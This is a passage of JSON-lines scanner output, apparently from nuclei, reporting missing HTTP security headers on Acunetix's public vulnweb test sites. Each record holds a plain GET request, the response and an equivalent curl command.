style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9067')\\\" style=\\\"color:Black\\\" title=\\\"October 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9068')\\\" style=\\\"color:Black\\\" title=\\\"October 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9069')\\\" style=\\\"color:Black\\\" title=\\\"October 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9070')\\\" style=\\\"color:Black\\\" title=\\\"October 31\\\"\\u003e31\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9071')\\\" style=\\\"color:Black\\\" title=\\\"November 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9072')\\\" style=\\\"color:Black\\\" title=\\\"November 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9073')\\\" style=\\\"color:Black\\\" title=\\\"November 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9074')\\\" style=\\\"color:Black\\\" title=\\\"November 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9075')\\\" style=\\\"color:Black\\\" title=\\\"November 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9076')\\\" style=\\\"color:Black\\\" title=\\\"November 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9077')\\\" style=\\\"color:Black\\\" title=\\\"November 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9078')\\\" style=\\\"color:Black\\\" title=\\\"November 08\\\"\\u003e8\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9079')\\\" style=\\\"color:Black\\\" title=\\\"November 09\\\"\\u003e9\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9080')\\\" style=\\\"color:Black\\\" title=\\\"November 10\\\"\\u003e10\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9081')\\\" style=\\\"color:Black\\\" title=\\\"November 11\\\"\\u003e11\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9082')\\\" style=\\\"color:Black\\\" title=\\\"November 12\\\"\\u003e12\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"border-color:#806640;width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9083')\\\" style=\\\"color:Black\\\" title=\\\"November 13\\\"\\u003e13\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9084')\\\" style=\\\"color:Black\\\" title=\\\"November 14\\\"\\u003e14\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9085')\\\" style=\\\"color:Black\\\" title=\\\"November 15\\\"\\u003e15\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9086')\\\" style=\\\"color:Black\\\" title=\\\"November 16\\\"\\u003e16\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9087')\\\" style=\\\"color:Black\\\" title=\\\"November 17\\\"\\u003e17\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9088')\\\" style=\\\"color:Black\\\" title=\\\"November 18\\\"\\u003e18\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9089')\\\" style=\\\"color:Black\\\" title=\\\"November 19\\\"\\u003e19\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9090')\\\" style=\\\"color:Black\\\" title=\\\"November 20\\\"\\u003e20\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9091')\\\" style=\\\"color:Black\\\" title=\\\"November 21\\\"\\u003e21\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9092')\\\" style=\\\"color:Black\\\" title=\\\"November 22\\\"\\u003e22\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9093')\\\" style=\\\"color:Black\\\" title=\\\"November 23\\\"\\u003e23\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9094')\\\" style=\\\"color:Black\\\" title=\\\"November 24\\\"\\u003e24\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9095')\\\" style=\\\"color:Black\\\" title=\\\"November 25\\\"\\u003e25\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9096')\\\" style=\\\"color:Black\\\" title=\\\"November 26\\\"\\u003e26\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9097')\\\" style=\\\"color:Black\\\" title=\\\"November 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9098')\\\" style=\\\"color:Black\\\" title=\\\"November 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9099')\\\" style=\\\"color:Black\\\" title=\\\"November 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9100')\\\" style=\\\"color:Black\\\" title=\\\"November 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9101')\\\" style=\\\"color:Black\\\" title=\\\"December 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9102')\\\" style=\\\"color:Black\\\" title=\\\"December 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9103')\\\" style=\\\"color:Black\\\" title=\\\"December 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9104')\\\" style=\\\"color:Black\\\" title=\\\"December 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9105')\\\" style=\\\"color:Black\\\" title=\\\"December 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9106')\\\" style=\\\"color:Black\\\" title=\\\"December 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9107')\\\" style=\\\"color:Black\\\" title=\\\"December 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\u003c/table\\u003e\\u003cBR\\u003e\\r\\n\\u003ca href=\\\"rssFeed.aspx\\\"\\u003eGet RSS feed\\u003c/a\\u003e\\r\\n\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD colSpan=\\\"2\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\u003c/TABLE\\u003e\\r\\n\\t\\t\\u003c/form\\u003e\\r\\n\\t\\u003c/body\\u003e\\r\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\t\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.\\u003c/p\\u003e\\r\\n\\t\\u003c/div\\u003e\\r\\n\\u003c/HTML\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:17.251187521Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15' 'http://testaspnet.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/T\",\"path\":\"/T\",\"matched-at\":\"http://testasp.vulnweb.com/T/\",\"request\":\"GET /T HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nContent-Length: 1233\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:46 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e403 - Forbidden: Access is denied.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e403 - Forbidden: Access is denied.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eYou do not have permission to view this directory or page using the credentials that you supplied.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:17.251255556Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1' 'http://testasp.vulnweb.com/T'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/login\",\"path\":\"/login\",\"matched-at\":\"http://testhtml5.vulnweb.com/login\",\"request\":\"GET /login HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:17.839500246Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/login'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202\",\"path\":\"/static/app/libs/sessvars.js:202\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202\",\"request\":\"GET /static/app/libs/sessvars.js:202 HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:17.839480602Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/admin\",\"path\":\"/admin\",\"matched-at\":\"http://testhtml5.vulnweb.com/admin\",\"request\":\"GET /admin HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 308 PERMANENT REDIRECT\\r\\nConnection: close\\r\\nContent-Length: 253\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nLocation: http://localhost/admin/\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003eRedirecting...\\u003c/title\\u003e\\n\\u003ch1\\u003eRedirecting...\\u003c/h1\\u003e\\n\\u003cp\\u003eYou should be redirected automatically to target URL: \\u003ca href=\\\"http://localhost/admin/\\\"\\u003ehttp://localhost/admin/\\u003c/a\\u003e. If not click the link.\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:17.839503802Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/admin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/.carousel\",\"path\":\"/.carousel\",\"matched-at\":\"http://testhtml5.vulnweb.com/.carousel\",\"request\":\"GET /.carousel HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 NOT FOUND\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:17.988593716Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50' 'http://testhtml5.vulnweb.com/.carousel'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"path\":\"/ajax/archive\",\"matched-at\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"request\":\"GET /ajax/archive HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 2\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n[]\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:17.988649116Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48' 